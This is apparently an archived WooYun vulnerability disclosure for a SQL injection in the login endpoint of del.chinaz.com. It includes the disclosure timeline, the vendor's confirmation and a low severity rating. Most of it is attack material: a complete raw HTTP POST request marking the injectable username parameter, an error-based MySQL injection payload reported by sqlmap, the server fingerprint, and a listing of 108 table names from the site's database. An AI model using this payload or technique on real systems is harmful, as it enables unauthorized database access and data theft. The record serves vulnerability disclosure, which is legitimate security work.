乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-02: 细节已通知厂商并且等待厂商处理中 2015-11-03: 厂商已经确认,细节仅向厂商公开 2015-11-13: 细节向核心白帽子及相关领域专家公开 2015-11-23: 细节向普通白帽子公开 2015-12-03: 细节向实习白帽子公开 2015-12-18: 细节向公众公开
POST /api-login.aspx HTTP/1.1Content-Length: 86Content-Type: application/x-www-form-urlencodedReferer: http://del.chinaz.comCookie: searchhistory=1-%3fkw%3d1%26p%3d0%26bl%3d1%26el%3d1%26ds%255B%255D%3d2%26ds%255B%255D%3d1%26py%3d1%26pl%3d1%26cv%3d1%26vy%3d1%26ai%3d1%26hs%3d1%26sort%3d1%26suffix%255B%255D%3dcom%26dt%3d0%26date%3d2015%26pagesize%3d30; tabswitch=leftside; CNZZDATA5082706=cnzz_eid%3D1522931093-1444446673-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1444446673; CNZZDATA433095=cnzz_eid%3D1746983847-1444446394-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1444446394Host: del.chinaz.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*login=&autologin=autologin&logintype=username&password=g00dPa%24%24w0rD&username=1%22)* --
注入点:username,注意该参数格式,里面含有*
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: login=&autologin=autologin&logintype=username&password=g00dPa$$w0rD&username=1") AND (SELECT 1595 FROM(SELECT COUNT(*),CONCAT(0x717a6a7071,(SELECT (ELT(1595=1595,1))),0x716b707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) -- ---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: MySQL 5.0Database: idc123[108 tables]+-------------------------+| ad_compete_price || ad_manage_tag || ad_manage_tag_sell || admin || admin_group || admin_log || cn_domain || cn_domain_0 || cn_domain_1 || cn_domain_2 || cn_domain_3 || cn_domain_4 || cn_domain_5 || cnidc_goods || config_email || dede_addonarticle || dede_addonimages || dede_addoninfos || dede_addonshop || dede_addonsoft || dede_addonspec || dede_admin || dede_admintype || dede_advancedsearch || dede_arcatt || dede_arccache || dede_archives || dede_arcrank || dede_arctiny || dede_arctype || dede_area || dede_channeltype || dede_co_htmls || dede_co_mediaurls || dede_co_note || dede_co_onepage || dede_co_urls || dede_diyforms || dede_downloads || dede_erradd || dede_feedback || dede_flink || dede_flinktype || dede_freelist || dede_homepageset || dede_keywords || dede_log || dede_member || dede_member_company || dede_member_flink || dede_member_friends || dede_member_guestbook || dede_member_operation || dede_member_person || dede_member_pms || dede_member_snsmsg || dede_member_space || dede_member_stow || dede_member_tj || dede_member_type || dede_member_vhistory || dede_moneycard_record || dede_moneycard_type || dede_mtypes || dede_myad || dede_mytag || dede_plus || dede_pwd_tmp || dede_ratings || dede_scores || dede_search_cache || dede_search_keywords || dede_sgpage || dede_shops_delivery || dede_shops_orders || dede_shops_paytype || dede_shops_products || dede_shops_userinfo || dede_softconfig || dede_stepselect || dede_sys_enum || dede_sys_module || dede_sys_set || dede_sys_task || dede_sysconfig || dede_tagindex || dede_taglist || dede_uploads || dede_verifies || dede_vote || domain_category || domain_price || ipaddress || member || member_sellers || search_keys || send_email || send_email_log || speed_result || user_buyinfo || user_get_pwd || user_sellers || user_sellers_alteration || user_sellers_evaluation || user_sellers_view || user_speed || user_status || users |+-------------------------+
危害等级:低
漏洞Rank:3
确认时间:2015-11-03 08:13
已安排屏蔽 谢谢反馈
暂无